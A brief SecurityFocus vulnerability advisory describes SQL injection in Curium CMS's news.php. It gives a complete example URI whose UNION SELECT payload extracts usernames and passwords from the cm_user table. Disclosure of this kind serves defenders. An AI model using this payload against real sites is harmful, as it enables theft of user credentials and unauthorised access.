Curium CMS News.PHP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

An example URI is available:

http://www.example.com/news.php?id=-1&c_id=-1%20union%20select%200,1,concat(username,char(32),password),3,4,5,6,7,8,9,0%20from%20cm_user


 

Privacy Statement
Copyright 2010, SecurityFocus